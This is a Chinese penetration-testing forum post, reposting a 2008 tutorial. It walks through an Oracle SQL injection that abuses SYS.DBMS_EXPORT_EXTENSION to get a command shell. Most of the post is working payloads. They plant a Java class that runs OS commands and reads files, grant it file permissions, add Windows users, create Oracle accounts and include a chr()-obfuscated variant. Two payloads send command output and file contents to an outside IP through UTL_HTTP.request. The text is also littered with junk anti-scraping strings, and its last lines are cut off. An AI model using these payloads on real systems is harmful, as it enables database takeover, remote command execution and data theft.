中国网络渗透测试联盟
标题:
实例演示oracle注入获取cmdshell的全过程
[打印本页]
作者:
admin
时间:
2012-12-18 12:21
标题:
实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
2 g0 j9 k; g; b, }8 h
/ _2 G! ^' X5 T# r
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
l* Q" z0 e' V7 g) D9 I
的形式即可。(用" 'a'|| "是为了让语句返回true值)
9 m$ n8 H7 ~( V. Y. x
语句有点长,可能要用post提交。
( c2 V, D: h4 N
以下是各个步骤:
$ e0 C( t! g5 q) r; f2 m! p
1.创建包
# _9 Q# x) K, I. M( }! V0 x
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
' I' d4 s8 n* ^% H& {) z' _; m
/xxx.jsp?id=1 and '1'<>'a'||(
* S' v5 i8 u; F3 G, t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 \, M+ ?+ `+ w7 @6 Q- r% o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 M0 [) h( D7 V3 a' u% F( {, f
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
7 i# v2 u0 f8 J) ?" X5 f: E
}'''';END;'';END;--','SYS',0,'1',0) from dual
8 G5 a8 R& a0 ~/ {- s- |4 }: z
)
4 w1 }! D& }' x4 f1 r# B ~& l% u4 C
------------------------
1 L3 {, ^& }- V4 H- C
如果url有长度限制,可以把readFile()函数块去掉,即:
- [: J. ?5 l0 t9 x7 G1 H5 k1 Z
/xxx.jsp?id=1 and '1'<>'a'||(
5 e0 c8 q$ m. j7 l! [/ q+ b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" W) F4 T1 A; M a. |( v
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
! D8 U) k W7 B+ z) A$ J# W( e
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
9 V# e% [0 u$ V" i, S
}'''';END;'';END;--','SYS',0,'1',0) from dual
( ?! ]* H$ n E% D' e% Q
)
, G) G% F1 m5 e3 q; u
同时把后面步骤 提到的 对readFile()的处理语句去掉。
6 s8 g/ E! n$ D3 M! P. ^
------------------------------
( V/ P# Z$ {) S; h% I& @5 M& h/ q
2.赋Java权限
7 p* i1 a# E3 l* ?! Q' }( M3 @; D# k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
X X' [0 s' `& P4 D
3.创建函数
: r' _2 e0 Z" m! Y" q8 X: X3 l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ Y' ^0 b* }- `. ]. u/ d
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
6 s- \, M6 h: H7 I1 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 O4 O; |; y* S/ }' }3 d
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
, {- |6 M2 C* I
4.赋public执行函数的权限
2 t* g5 E' {2 F( V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
, A# x9 u% \3 e+ O) A5 o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
4 g$ R0 J% S' p& w$ n S: N
5.测试上面的几步是否成功
) A+ n8 \( q# T9 I0 r
and '1'<>'11'||(
& h) @. m* o' u0 @
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
: S$ z( H; z0 }
)
2 ~: h# V, o# E" A+ E1 S
and '1'<>(
* ]& d* R: ]# C6 ?: F" b1 D4 i4 I2 ~
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
( _/ ~$ s; Q6 Q- B( A0 E9 [
)
) x9 |- F N/ Z2 d! w: H* e
6.执行命令:
z* U8 S" W. M% H1 d
/xxx.jsp?id=1 and '1'<>(
5 x: m+ L, C/ y6 S+ n
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
: s1 U& _ M- B, ~ s: I
& _" E/ B j+ ?
)
. \& @5 R( @! [& G. y
/xxx.jsp?id=1 and '1'<>(
' b5 ~5 e, x7 x, i! R! _
select sys.LinxReadFile('c:/boot.ini') from dual
- \% L6 ^$ B% r$ ~/ Y/ u) \
5 \0 g3 c; F' q3 W E
)
& i' S# j5 \; H q7 e4 Q
/ M$ w" Y2 w* a5 ~* t4 k
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
& l, \( }% S* U6 Q
如果要查看运行结果可以用 union :
& X1 l, P% ]" ^! M
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
. k9 ^* X+ i7 m4 u/ ]
或者UTL_HTTP.request(:
8 s5 `5 D) g! z( l3 {
/xxx.jsp?id=1 and '1'<>(
2 N/ G. z- A4 F3 N9 N
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
# a5 i! |+ Q# M, b( C6 h* i
)
; G7 O! O! ]0 k8 O0 ^4 L0 {
/xxx.jsp?id=1 and '1'<>(
$ |, o( b X& U# z5 g- U% ?$ d1 o
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
: F9 Y- L* U' [
)
/ K& ^' [- V6 a7 V/ _6 U/ f
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
, M6 K" k: K& [! m2 w
--------------------
/ P% d9 x' H* {# x6 A
6.内部变化
3 m h: x7 u% G5 h1 W) K8 K
通过以下命令可以查看all_objects表达改变:
; o/ O% t, @# C; ]2 k
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
" A1 Z6 e* c$ O
7.删除我们创建的函数
2 @2 ~. [, p* Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- e; ]) f# _$ h; h4 ~5 ]; Q
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
" t5 J3 O8 v: a5 ?2 I% H/ p3 I
====================================================
& T4 H( r ]) Y
全文结束。谨以此文赠与我的朋友。
$ U4 H5 {/ i* `3 k* d b* i8 Z! g
linx
* F9 O8 w& N# p
124829445
8 Z2 O) b7 R/ K6 Q5 `! s! ]
2008.1.12
" M' X" o- V8 r2 y$ C! ?3 t
linyujian@bjfu.edu.cn
# `' o1 h( M- t$ j
======================================================================
+ f6 t( R: N6 H0 Q6 K
测试漏洞的另一方法:
5 M* M2 F4 G; Q: v4 _; ]# k
创建oracle帐号:
+ K9 B) S/ [$ m+ i, o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& i H& a" S% H
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
9 \! m% B+ U* l( t$ R
即:
2 N& ?$ X( C2 ]/ ]0 ], Q3 R" F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
/ B# ~4 }# [8 l2 @5 T. n
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
! z1 ~6 k' U! l9 E
确定漏洞存在:
0 i. O* _; F- A' ?' F
1<>(
, F" E+ u' V2 f! g
select user_id from all_users where username='LINXSQL'
; f, Q4 n" u+ |4 S; s7 R% u# J
)
5 G* `3 F# c$ D7 _8 `% [
给linxsql连接权限:
- U! z' [! Y' s' d% |) b- N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 k; G3 D$ p/ x) u/ t
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
5 H5 {1 Z' f2 O6 w* t& Z( E
删除帐号:
8 r$ F0 t- ~& E$ ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 X' [9 M) T. S& K2 h# x& Q9 E
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
0 O. ^5 a. ?8 v4 R7 a. D8 ?0 ?0 W5 h
======================
8 R$ W) A; W- _6 n/ e/ L
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
/ C$ ]- m, K/ r$ I2 g* o( c8 W( M2 p/ J
1.jsp?id=1 and '1'<>(
! V& ?- q/ A# Q" }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' `7 P! }: ]/ g
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
) C4 |( ?! e. p
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
$ k+ H! H }% B5 z
)
: \4 g$ c$ i* h+ n$ i* g8 _
3 d+ B' H; I1 G! Z, T
9 M g( Z1 ?$ c
! T. i( C5 z1 y+ g8 W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2